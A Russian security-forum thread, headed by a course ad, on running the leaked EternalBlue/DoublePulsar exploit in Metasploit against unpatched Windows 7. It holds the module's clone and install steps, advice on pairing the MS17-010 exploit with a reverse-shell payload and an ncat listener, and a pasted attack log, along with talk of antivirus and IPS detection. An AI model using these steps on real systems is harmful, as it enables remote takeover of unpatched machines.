• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Eternalblue & Doublepulsar Exploit in Metasploit Win 7 Hack

Всем хорошего.

Наверное все уже начитались про слитые с ресурсов АНБ кучу разных утилит, уязвимостей и т.д. Eternalblue & Doublepulsar Exploit одна из них, и как не странно, все еще актуальность имеет. Хотя почему странно, если у нас люди сидят по 3-4 года на Win 7 не обновлясь ( у некоторых причина - потеря хакнутой лицензии, тачка не тянет, и так все работает ). так вот, данный экслоит нацелен на remote эксплоутацию.

берем тут git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

файл eternalblue_doublepulsar.rb копируем сюда /usr/share/metasploit-framework/modules/exploits/windows/smb

собственно все на скринах

17164633.png

17164647.png

17164652.png


Если все пройдет успешно - получим доступ к тачке.

17164720.png


В моем случае это был Win7 Ентерпрайз
[doublepost=1494355854,1494355356][/doublepost]то что IP разные на скринах - перазапускал виртуалку и другой комп заюзал для атаки
[doublepost=1494358832][/doublepost]Видео по теме (не мое)

 

fan9

One Level
02.02.2018
8
1
BIT
0
да в курсе, мсф стоит уже и используется частенько, дома есстественно , но вот для 32 бит понадобился этот эксплоит, ноут то конечно все пробивает, но было бы не плохо и на телефоне иметь:)
на телефоне можно заюзать exploit7 отсюда worawit/MS17-010 нагрузив его windows/shell_reverse_tcp и получим командную строку.Прослушку сделать предварительно ncat -ом.
Screenshot_2018-08-09-05-00-45.png
 
  • Нравится
Реакции: OneDollar

Lisenok

Green Team
02.04.2016
133
75
BIT
0
на телефоне можно заюзать exploit7 отсюда worawit/MS17-010 нагрузив его windows/shell_reverse_tcp и получим командную строку.Прослушку сделать предварительно ncat -ом.
а как ты импакет устанавливал?у меня он чет не встает на моменте установки pycrypto.
 

fan9

One Level
02.02.2018
8
1
BIT
0
а как ты импакет устанавливал?у меня он чет не встает на моменте установки pycrypto.
я пукрипто собрал отдельно прямо на смарте, заюзав gcc от c4droida,. Пришлось извращаться потому как смарт древний на 4-ом андроиде и места для установки метасплоита не хватало, но зато мониторинг моде поднимается на оригинальной прошивке, соответственно я на нём и последний ривер с пиксидастом собрал. Питоновским exploit7 32-битная 7-ка пробивается какждый раз и без бсод. Пробовал так же метасплоит сесию возвращать на ноут с убунтой и всё отрабатывает как надо. Все другие эксплоиты этого сделать не могут
 

Lisenok

Green Team
02.04.2016
133
75
BIT
0
я пукрипто собрал отдельно прямо на смарте, заюзав gcc от c4droida,. Пришлось извращаться потому как смарт древний на 4-ом андроиде и места для установки метасплоита не хватало, но зато мониторинг моде поднимается на оригинальной прошивке, соответственно я на нём и последний ривер с пиксидастом собрал. Питоновским exploit7 32-битная 7-ка пробивается какждый раз и без бсод. Пробовал так же метасплоит сесию возвращать на ноут с убунтой и всё отрабатывает как надо. Все другие эксплоиты этого сделать не могут
к тебе обратиться можно будет если не получиться собрать?
 
P

Partiizan

Screenshot_2.png



Софтина, которая дала вторую жизнь 17-10 )
 

fan9

One Level
02.02.2018
8
1
BIT
0
Софтина, которая дала вторую жизнь 17-10 )

Скорее тулкит для нубов в который собрали все питоновские версии из открытого доступа. AV как перехватывал атаку,так и перехватывает. Черезмерную длину пакета на smb-порт не спрячеш.
 

Tayrus

Red Team
13.04.2017
365
787
BIT
6
Скорее тулкит для нубов в который собрали все питоновские версии из открытого доступа. AV как перехватывал атаку,так и перехватывает. Черезмерную длину пакета на smb-порт не спрячеш.
Насколько я помню AV палит .dll файл(при этом эскплоите). Видел тутор где-то как его заменяли.
 

fan9

One Level
02.02.2018
8
1
BIT
0
Что ты подразумеваешь под словом "атака"?
отправка специфического пакета приводящая к переполнению буфера и дающая возможность запуска своего кода. Этот пакет не содержит сам код который мы хотим запустить (тоесть шел и полезную нагрузку). Картинку которую я вверху прикрепил аваст выдал до начала загрузки шела.
 
Последнее редактирование:

Dinzex

Green Team
15.04.2018
22
8
BIT
0
ребят, для реализации такой уязвимости необходимо открыть у себя 445 порты?
 
  • Нравится
Реакции: Chairman

trueflownature

Green Team
31.03.2018
31
9
BIT
0
Ктонибудь с таким сталкивался?

[*] Started reverse TCP handler on 192.168.1.19:4444
[*] 192.168.1.191:445 - Generating Eternalblue XML data
[*] 192.168.1.191:445 - Generating Doublepulsar XML data
[*] 192.168.1.191:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.191:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.191:445 - Launching Eternalblue...
000f:err:service: process_send_command receiving command result timed out
0015:err:service: process_send_command receiving command result timed out
0029:err: plugplay:handle_bus_relations Failed to load driver L"WineHID"
[-] Error getting output back from Core; aborting...
[-] 192.168.1.191:445 - Are you sure it's vulnerable?
[*] 192.168.1.191:445 - Launching Doublepulsar...
000f:err:service: process_send_command receiving command result timed out
[-] 192.168.1.191:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
 

fan9

One Level
02.02.2018
8
1
BIT
0
IPS блокирует данный эксплойт еще до работы антивирусного движка.
IPS расшифруйте. По моим тестам блокировка идёт именно со стороны АV , по крайней мере аваст не долго думая просто перехватывает SMB команду SMB_COM_NT_TRANSACT , с которой собственно и начинается вся атака позволяющая послать больше чем 65535 байт жертве.
 

pr0phet

Platinum
02.04.2018
358
496
BIT
9
IPS расшифруйте. По моим тестам блокировка идёт именно со стороны АV , по крайней мере аваст не долго думая просто перехватывает SMB команду SMB_COM_NT_TRANSACT , с которой собственно и начинается вся атака позволяющая послать больше чем 65535 байт жертве.
В современных антивирусах помимо файлового движка есть IPS. Аббревиатуру расшифровали выше. Так же если в разрыв трафика стоит отдельная IPS ( допустим снорт), то пакет до машины с антивирусом не долетит вовсе.
 
  • Нравится
Реакции: ghostphisher и Underwood
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!